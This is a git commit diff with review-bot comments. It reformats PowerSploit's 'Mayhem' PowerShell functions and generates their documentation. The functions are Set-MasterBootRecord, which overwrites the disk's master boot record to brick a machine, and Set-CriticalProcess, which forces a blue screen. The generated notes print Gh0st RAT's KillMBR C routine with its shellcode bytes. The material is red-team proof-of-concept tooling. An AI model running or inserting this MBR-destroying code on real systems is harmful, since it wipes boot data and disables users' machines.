For ./Mayhem/ :

-PSScriptAnalyzering
    -Tweaking of synopsis blocks in order to support platyPS
    -Code standardization
    -Generated docs
This commit is contained in:
HarmJ0y 2016-12-14 18:05:22 -05:00
parent 1980f403ee
commit a81faf36a4
4 changed files with 390 additions and 92 deletions


@ -38,10 +38,8 @@ function Set-MasterBootRecord
.NOTES .NOTES
Obviously, this will only work if you have a master boot record to Obviously, this will only work if you have a master boot record to
overwrite. This won't work if you have a GPT (GUID partition table) overwrite. This won't work if you have a GPT (GUID partition table).
#>
<#
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us): This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers // CGh0stApp message handlers
@ -83,8 +81,8 @@ int CGh0stApp::KillMBR()
NULL, NULL,
0, 0,
&dwBytesReturned, &dwBytesReturned,
NULL NUL
); )
// ?????? // ??????
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl DeviceIoControl
@ -105,7 +103,9 @@ int CGh0stApp::KillMBR()
} }
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[ValidateLength(1, 479)] [ValidateLength(1, 479)]
[String] [String]
$BootMessage = 'Stop-Crying; Get-NewHardDrive', $BootMessage = 'Stop-Crying; Get-NewHardDrive',
@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
$MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize) $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
# Zero-initialize the allocated unmanaged memory # Zero-initialize the allocated unmanaged memory
0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) } 0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
[Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length) [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[Switch] [Switch]
$Force, $Force,
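Review bot: The quoted Gh0st RAT reference inside the .NOTES help block now reads `NUL` and loses the closing `);` of the first DeviceIoControl call (new side of the `@ -83,8 +81,8` hunk), which looks like an accidental edit since the old side had `NULL` and `);`. Because the `#>` / `<#` split was removed in the first hunk, that block is now part of the comment-based help, so the corrupted lines are copied verbatim into the generated Set-MasterBootRecord.md NOTES section. Restore `NULL` and `);` so the help text and generated docs match the cited source. Separately, the `PSUseDeclaredVarsMoreThanAssignments` suppression on Set-CriticalProcess is applied with an empty target, which silences the rule for every variable in the function; if it is meant for one variable, name it in the second argument, e.g. `[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '<VARIABLE_NAME>')]`, so new dead assignments are still reported. Both function bodies continue outside the hunks shown.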


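--- a/Mayhem/Set-CriticalProcess.md
+++ b/Mayhem/Set-CriticalProcess.md
@@ -0,0 +1,108 @@
+# Set-CriticalProcess
+## SYNOPSIS
+Causes your machine to blue screen upon exiting PowerShell.
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+## SYNTAX
+```
+Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
+```
+## DESCRIPTION
+{{Fill in the Description}}
+## EXAMPLES
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-CriticalProcess
+```
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Set-CriticalProcess -ExitImmediately
+```
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Set-CriticalProcess -Force -Verbose
+```
+## PARAMETERS
+### -Force
+Set the running PowerShell process as critical without asking for confirmation.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+### -ExitImmediately
+Immediately exit PowerShell after successfully marking the process as critical.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+## INPUTS
+## OUTPUTS
+## NOTES
+## RELATED LINKS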


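--- a/Mayhem/Set-MasterBootRecord.md
+++ b/Mayhem/Set-MasterBootRecord.md
@@ -0,0 +1,184 @@
+# Set-MasterBootRecord
+## SYNOPSIS
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+PowerSploit Function: Set-MasterBootRecord
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+## SYNTAX
+```
+Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
+```
+## DESCRIPTION
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR.
+This technique was taken
+from a public malware sample.
+This script is inteded solely as proof of
+concept code.
+## EXAMPLES
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+```
+## PARAMETERS
+### -BootMessage
+Specifies the message that will be displayed upon making your computer a brick.
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+Required: False
+Position: 1
+Default value: Stop-Crying; Get-NewHardDrive
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+### -RebootImmediately
+Reboot the machine immediately upon overwriting the MBR.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+### -Force
+Suppress the warning prompt.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+## INPUTS
+## OUTPUTS
+## NOTES
+Obviously, this will only work if you have a master boot record to
+overwrite.
+This won't work if you have a GPT (GUID partition table).
+This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
+// CGh0stApp message handlers
+unsigned char scode\[\] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+int CGh0stApp::KillMBR()
+{
+HANDLE hDevice;
+DWORD dwBytesWritten, dwBytesReturned;
+BYTE pMBR\[512\] = {0};
+// ????MBR
+memcpy(pMBR, scode, sizeof(scode) - 1);
+pMBR\[510\] = 0x55;
+pMBR\[511\] = 0xAA;
+hDevice = CreateFile
+(
+"\\\\\\\\.\\\\PHYSICALDRIVE0",
+GENERIC_READ | GENERIC_WRITE,
+FILE_SHARE_READ | FILE_SHARE_WRITE,
+NULL,
+OPEN_EXISTING,
+0,
+NULL
+);
+if (hDevice == INVALID_HANDLE_VALUE)
+return -1;
+DeviceIoControl
+(
+hDevice,
+FSCTL_LOCK_VOLUME,
+NULL,
+0,
+NULL,
+0,
+&dwBytesReturned,
+NUL
+)
+// ??????
+WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+DeviceIoControl
+(
+hDevice,
+FSCTL_UNLOCK_VOLUME,
+NULL,
+0,
+NULL,
+0,
+&dwBytesReturned,
+NULL
+);
+CloseHandle(hDevice);
+ExitProcess(-1);
+return 0;
+}
+## RELATED LINKS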


@ -124,7 +124,11 @@ pages:
- Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md' - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
- CodeExecution: - CodeExecution:
- Functions: - Functions:
- Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md' - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md' - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md' - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
- Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md' - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
- Mayhem:
- Functions:
- Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
- Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'
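Review bot: The new Mayhem entries list Set-MasterBootRecord before Set-CriticalProcess, whereas the CodeExecution block just above keeps its Functions in alphabetical order; swapping the two lines so `- Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'` comes first keeps the nav consistent with the other sections. The `pages:` mapping continues outside the hunk.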